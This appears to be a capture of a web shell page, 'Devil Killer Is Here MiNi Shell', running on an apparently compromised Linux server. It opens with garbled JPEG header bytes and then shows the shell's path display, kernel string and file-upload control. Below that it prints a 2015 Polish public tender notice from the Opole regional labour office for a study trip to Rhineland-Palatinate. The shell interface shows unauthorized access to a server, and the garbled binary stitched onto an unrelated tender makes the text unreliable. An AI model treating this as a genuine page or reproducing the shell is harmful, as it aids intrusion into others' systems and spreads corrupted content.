JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20150720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20150720/107281-N-2015.html

<p class="kh_header"><b>Opole: Organizacja wyjazdu studyjnego do regionu Nadrenii - Palatynatu obejmująca usługę transportową, hotelową i gastronomiczną w ramach projektu pn. Wsparcie kompetencji na starcie realizowanego przez Wojewódzki Urząd Pracy w Opolu</b><br>
<b>Numer ogłoszenia: 107281 - 2015; data zamieszczenia: 20.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 0-77 4416701, faks 0-77 4416702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wyjazdu studyjnego do regionu Nadrenii - Palatynatu obejmująca usługę transportową, hotelową i gastronomiczną w ramach projektu pn. Wsparcie kompetencji na starcie realizowanego przez Wojewódzki Urząd Pracy w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usługi organizacji wyjazdu studyjnego do regionu Nadrenii-Palatynatu obejmującej usługę transportową, hotelową i gastronomiczną w ramach projektu pn. Wsparcie kompetencji na starcie, realizowanego przez Wojewódzki Urząd Pracy w Opolu w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy Programu Operacyjnego Kapitał Ludzki 2007-2013 dla przedstawicieli Wojewódzkiego Urzędu Pracy w Opolu, Urzędu Marszałkowskiego Województwa Opolskiego, Powiatowych Urzędów Pracy i innych instytucji rynku pracy. 

1.	Informacje ogólne:
1)	Miejsce docelowe wizyty studyjnej: Niemcy, region Nadrenia-Palatynat, miasta: Moguncja-Mainz, Trewir-Trier, ponadto: Bitburg, Saarbruecken. 
2)	Termin realizacji: Wyjazd trwać będzie 5 dni (od poniedziałku do piątku) i zrealizowany (zakończony) będzie w terminie nie późniejszym niż do 18 września 2015 r. Ostateczny termin wyjazdu zostanie podany Wykonawcy najpóźniej na 14 dni przed dniem wyjazdu.
3)	Liczba dni wizyty studyjnej: 5 dni - w tym 4 noclegi 
4)	Uczestnicy: pracownicy Wojewódzkiego Urzędu Pracy w Opolu, Urzędu Marszałkowskiego Województwa Opolskiego, Powiatowych Urzędów Pracy i innych instytucji rynku pracy. 
5)	Liczba uczestników: 12-17 osób. Ostateczna lista uczestników zostanie przesłana Wykonawcy na 5 dni roboczych przed datą wyjazdu
6)	Środek transportu: autokar.

2.	Zakres usługi transportowej:
1)	Wykonawca zobowiązany jest do zapewnienia przewozu - autokarem - uczestników wizyty studyjnej na trasach:
a)	w pierwszym dniu wyjazdu - przejazd z miejsca zbiórki w Opolu do miejsca noclegu (hotelu) w Mainz-Moguncja,
b)	w drugim dniu wyjazdu - przejazdy pomiędzy miejscami uwzględnionymi w poszczególnych punktach programu,
c)	w trzecim dniu wyjazdu - przejazdy pomiędzy miejscem noclegu (hotelem) w Mainz-Moguncji, a miejscami uwzględnionymi w poszczególnych punktach programu i miejscem noclegu (hotelem) w Trier/Trewir,
d)	w czwartym dniu wyjazdu - przejazdy pomiędzy miejscami uwzględnionymi w poszczególnych punktach programu,
e)	w piątym dniu wyjazdu - przejazd z  miejsca noclegu (hotelu) w Trier-Trewirze do miejsca wskazanego przez Zamawiającego w Opolu.
2)	Wszelkie koszty związane z wykonywaniem przewozu, ubezpieczeniem oraz noclegiem i wyżywieniem kierowców oraz innymi opłatami wynikającymi z podróży (m.in. opłata za miejsca parkingowe, autostradę, paliwo, itp.) ponosi Wykonawca.
3)	Za miejsce siedziby Zamawiającego uznaje się: Wojewódzki Urząd Pracy w Opolu, 
ul. Głogowska 25c, 45-315 Opole;
4)	Wykonawca gwarantuje, że wszystkie przejazdy odbywać się będą bezpiecznym i odpowiednio do tego celu przystosowanym środkiem transportu tj. autokarem  nie starszym niż wyprodukowany w 2010 r., posiadającym siedzenia w układzie konferencyjnym, wyposażonym w rozstawiane fotele przystosowane do długich tras, klimatyzację,  min. 3 monitory, wyjścia multimedialne z możliwością podłączenia laptopa i przekaz obrazu na monitory pokładowe, min. 3 gniazdka pokładowe 230 V, automat do serwowania gorących napojów, WC wraz z umywalką dostępne w każdym momencie trwania podróży.
5)	W przypadku awarii pojazdu Wykonawca zapewni w ciągu 3 godzin pojazd zastępczy nie gorszy niż pojazd, w którym rozpoczęto podróż. Koszty zapewnienia transportu zastępczego ponosi Wykonawca. 
6)	Wykonawca poniesie wszelkie opłaty związane z miejscami parkingowymi (na terenie Polski i na terenie Niemiec), jak również opłaty za przejazd autostradami.

3.	Zakres usługi organizacji i realizacji wizyty studyjnej:
1)	Wykonawca zobowiązany jest do zapewnienia 4 noclegów dla każdego uczestnika wyjazdu, a także wskazanego przez Zamawiającego tłumacza według następującego podziału:
a)	pierwszy i drugi nocleg w miejscowości Mainz-Moguncja (Niemcy), w hotelu  znajdującym się w odległości maksymalnie 5 km w linii prostej od dworca głównego (Bahnhofplatz 6, 55116 Mainz), z zastrzeżeniem, iż oba noclegi dla wszystkich uczestników muszą odbyć się w tym samym hotelu,
b)	trzeci i czwarty nocleg w miejscowości Trier-Trewir (Niemcy), w hotelu położonym maksymalnie 5 km w linii prostej od katedry w Trier-Trewirze (Liebfrauenstr.12, 54290 Trier); z zastrzeżeniem, iż oba noclegi dla wszystkich uczestników muszą odbyć się w tym samym hotelu.
2)	Dodatkowo Zamawiający wymaga zorganizowania i zapewnienia 2 noclegów tj. w trzecim i czwartym dniu wyjazdu dla osoby realizującej, na potrzeby Zamawiającego, programu merytorycznego.
3)	Zamawiający wymaga zapewnienia noclegów w hotelach o standardzie co najmniej 3 - gwiazdkowym lub równoważnym, w pokojach 1 - osobowych dla osób niepalących z łazienkami w każdym pokoju, z dostępem do bezpłatnego, bezprzewodowego Internetu (WiFi) w każdym pokoju oraz zapleczem gastronomicznym w hotelu.
4)	Nie dopuszcza się możliwości przenoszenia żadnego uczestnika do innego hotelu po odbyciu części noclegów, poza przemieszczaniem się zgodnie z programem wizyty.
5)	Wszyscy uczestnicy w każdym miejscu noclegu muszą być zakwaterowani w tym samym hotelu, pod tym samym adresem.
6)	Wykonawca zobowiązany jest do zapewnienia pełnego wyżywienia dla uczestników wyjazdu oraz opiekuna, a także wskazanego przez Zamawiającego tłumacza na zasadach określonych w pkt. 3 ppkt. 4-13.
7)	Ponadto wykonawca jest zobowiązany do zapewnienia, na zasadach określonych w pkt. 3 ppkt. 4-13, w drugim, w trzecim i w czwartym dniu: obiadu, poczęstunku kawowego i kolacji dla maksymalnie trzech dodatkowych osób, wskazanych przez Zamawiającego spożywanych wspólnie z uczestnikami wyjazdu.
8)	Dzień drugi (wtorek):
a)	śniadanie w Mainz/Moguncja w hotelu, w którym będą odbywały się noclegi,
b)	obiad w restauracji położonej na terenie miasta Mainz -w godz. 12:00 - 14:00,
c)	poczęstunek kawowy podany bezpośrednio po obiedzie, w tym samym miejscu co obiad,
d)	kolacja w Mainz-Moguncja w restauracji hotelu, w którym odbywa się nocleg lub w restauracji znajdującej się w odległości maksymalnie 1500 m w linii prostej od miejsca noclegów w godz. 18:00 - 21:00.
Dzień trzeci (środa):
a)	śniadanie w Mainz-Moguncja w hotelu, w którym będą odbywały się noclegi,
b)	obiad w restauracji położonej w regionie, w godz. 12:00 - 14:00,
c)	poczęstunek kawowy podany bezpośrednio po obiedzie, w tym samym miejscu co obiad,
d)	kolacja w Trier-Trewirze w restauracji hotelu, w którym odbywa się nocleg lub w restauracji znajdującej się w odległości maksymalnie 1000 m w linii prostej od miejsca noclegów w godz. 18:00 - 21:00.
Dzień czwarty (czwartek):
a)	śniadanie w Trier-Trewirze w hotelu, w którym będą odbywały się noclegi,
b)	obiad w restauracji położonej na trasie Trier - Saarbrucken (Nadrenia-Palatynat) w godz. 12:00 - 14:00,
c)	poczęstunek kawowy podany bezpośrednio po obiedzie, w tym samym miejscu co obiad,
d)	kolacja w Trier-Trewirze w Niemczech w restauracji hotelu, w którym odbywa się nocleg lub w restauracji znajdującej się w odległości maksymalnie 1000 m w linii prostej od miejsca noclegów w godz. 18:00 - 21:00.
Dzień piąty (piątek): śniadanie w Trier-Trewirze w hotelu, w którym będą odbywały się noclegi.
9)	Każde  śniadanie dla każdego uczestnika wyjazdu ma być podane w formie bufetu.
10)	Każdy obiad dla każdego uczestnika ma składać się z co najmniej następujących elementów:
1)	przystawki lub zupy - min. 250 ml
2)	ciepłego dania głównego obejmującego:
(a)	 mięso lub rybę lub danie jarskie - min. 200 g,
(b)	dodatek skrobiowy - min. 150 g,
(c)	sos - min. 50 ml,
(d)	surówki lub sałaty - min. 150 g,
3)	napojów obejmujących:
a)	sok - 2 rodzaje łącznie min. 250 ml,
b)	wodę mineralną gazowaną - min. 250 ml,
c)	wodę mineralną niegazowaną - min. 250 ml,
11)	Menu obiadowe ma zostać tak dobrane, aby każdy uczestnik w każdym dniu wyjazdu miał prawo wyboru dania głównego mięsnego, rybnego bądź dania głównego jarskiego. Zamawiający nie dopuszcza, aby w ciągu 5 dni wyjazdu wystąpiła powtarzalność tego samego rodzaju posiłku. 
12)	Każdy poczęstunek kawowy dla każdego uczestnika wyjazdu ma składać się z co najmniej następujących elementów:
1)	kawa lub herbata w zależności od preferencji uczestników - min. 200 ml,
2)	śmietanka lub mleko do kawy - min. 20 g,
3)	świeża cytryna w plasterkach - min. 2 plasterki cytryny,
4)	cukier - min. 10 g.
13)	Każda kolacja dla każdego uczestnika ma składać się z co najmniej następujących elementów:
1)	dwóch rodzajów zimnych przystawek, każda po min. 100 g,
2)	ciepłego dania głównego obejmującego:
a)	   mięso lub rybę lub danie jarskie - min. 200 g,
b)	dodatek skrobiowy - min. 150 g,
c)	sos - min. 50 ml,
d)	surówki lub sałaty - min. 150 g,
3)	napojów wraz z dodatkami obejmującymi:
a)	sok - 2 rodzaje- łącznie min. 250 ml,
b)	wodę mineralną gazowaną - min. 250 ml,
c)	wodę mineralną niegazowaną - min. 250 ml,
d)	kawę lub herbatę w zależności od preferencji uczestników - min. 200 ml,
e)	śmietankę lub mleko do kawy - min. 20 g,
f)	świeżą cytrynę w plasterkach - min. 2 plasterki cytryny
g)	cukier - min. 10 g.
14)	Wykonawca zobowiązany jest do ubezpieczenia od następstw nieszczęśliwych wypadków (NNW) oraz kosztów leczenia każdego uczestnika na czas przejazdu i pobytu na kwotę co najmniej 20.000,00 zł. 
15)	Wykonawca zobowiązany jest ubezpieczyć bagaż każdego z uczestników wyjazdu na kwotę co najmniej 2.000,00 zł.
16)	Wykonawca zobowiązany jest do przekazania Zamawiającemu kopii polisy ubezpieczenia wraz z dowodem jej opłacenia najpóźniej na 3 dni robocze przed datą rozpoczęcia wyjazdu.

4.	WYMAGANIA DOTYCZĄCE ZAKRESU PROGRAMU MERYTORYCZNO - ORGANIZACYJNEGO
1)	W ramach wyjazdu Wykonawca dostosuje organizację usługi do przedstawionego przez Zamawiającego programu merytorycznego. Program merytoryczny obejmował będzie wizyty w instytucjach związanych z rynkiem pracy tj.: Ministerstwo ds. Socjalnych, Pracy, Zdrowia oraz Demografii Kraju Związkowego Nadrenii-Palatynatu; Agencja Pracy w Trier-Trewirze; Centrum Kształcenia Zawodowego Bitburg-Prüm; Instytut ds. Badań Rynku Pracy i Zawodów Krajowej Agencji Pracy - Oddział Regionalny, Saarbruecken:
a)	dzień pierwszy - transport na trasie Opole-Mainz (hotel), w trakcie którego odbywać się będzie spotkanie i prezentacja multimedialna biorących udział w wyjeździe specjalistów ds. metodologii jako wprowadzenie do tematyki wyjazdu  pn. Rynek pracy i polityka zatrudnienia celem opracowania strategii uzyskania niezbędnych informacji, analiz, badań dot. prognozowania rynku pracy w tym zapotrzebowania na zawody deficytowe, porównanie systemu dualnego w Polsce i w Niemczech celem zobrazowania różnic w oby systemach, 
b)	dzień drugi - wizyta w Ministerstwie ds. Socjalnych, Pracy, Zdrowia oraz Demografii Kraju Związkowego Nadrenii-Platynat, spotkanie z ekspertem z Instytutu ds. Badań Rynku Pracy i Zawodów Krajowej Agencji Pracy - Oddział Regionalny Nadrenia-Platynat - Kraj Saary następnie wizyta w Młodzieżowej Agecji Pracy w Mainz, 
c)	dzień trzeci - przejazd do Trewiru-Trier i wizyta w Agentur fur Arbeit-Urząd Pracy Trier, a następnie przejazd do Bitburga i wizyta w Centrum Kształcenia Zawodowego Bitburg-Prum, połączona ze zwiedzaniem miasta Trewir-Trier,
d)	dzień czwarty - przejazd do Saarbrucken i wizyta w Saar.is, następnie wizyta w Ministerstwie Gospodarki, Pracy, Energii oraz Transportu oraz zwiedzanie miasta Saarbrucken,
e)	dzień piąty - transport na trasie Trewir-Trier - Opole, w trakcie którego nastąpi podsumowanie wizyty studyjnej wraz z prezentacją zebranych materiałów dydaktycznych niezbędnych do powstania raportu i poradnika dla doradców zawodowych.
2)	Każda wizyta przewidywana jest na max. 2 godziny.
3)	Godziny spotkań w poszczególnych instytucjach ustali Zamawiający i poinformuje o nich Wykonawcę najpóźniej na 7 dni przed planowanym terminem wyjazdu.
4)	Dodatkowo Zamawiający dopuszcza możliwość wprowadzania zmian w programie merytorycznym na każdym etapie trwania wyjazdu.
5)	Wykonawca zorganizuje dwie dwugodzinne wycieczki (obejmujące dojazd, powrót i zwiedzanie) największych atrakcji turystycznych Trewiru-Trier i Saarbruecken, które odbędą się w trzecim i w czwartym dniu wyjazdu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 60.10.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis do Rejestru Operatorów Turystyki i Pośredników Turystycznych zgodnie z art. 4 ust. 1 ustawy z dnia 29 sierpnia 1997 r.  o usługach turystycznych (Dz. U. z 2014 r., poz. 196 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie - zrealizował co najmniej 3 wyjazdy zagraniczne dla grup zorganizowanych liczących minimum 15 osób na terenie Europy, z wyłączeniem obszaru Polski,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada autokar  nie starszy niż wyprodukowany w 2010 r., posiadający siedzenia w układzie konferencyjnym, wyposażony w rozstawiane fotele przystosowane do długich tras, klimatyzację,  min. 3 monitory, wyjścia multimedialne z możliwością podłączenia laptopa i przekaz obrazu na monitory pokładowe, min. 3 gniazdka pokładowe 230 V, automat do serwowania gorących napojów, WC wraz z umywalką dostępne w każdym momencie trwania podróży</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości min. 20.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach  zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy  wykonaniu zamówienia - wzór zobowiązania stanowi zał. nr 6 do formularza ofertowego,
- pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Rok produkcji autokaru - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany postanowień zawartej umowy:
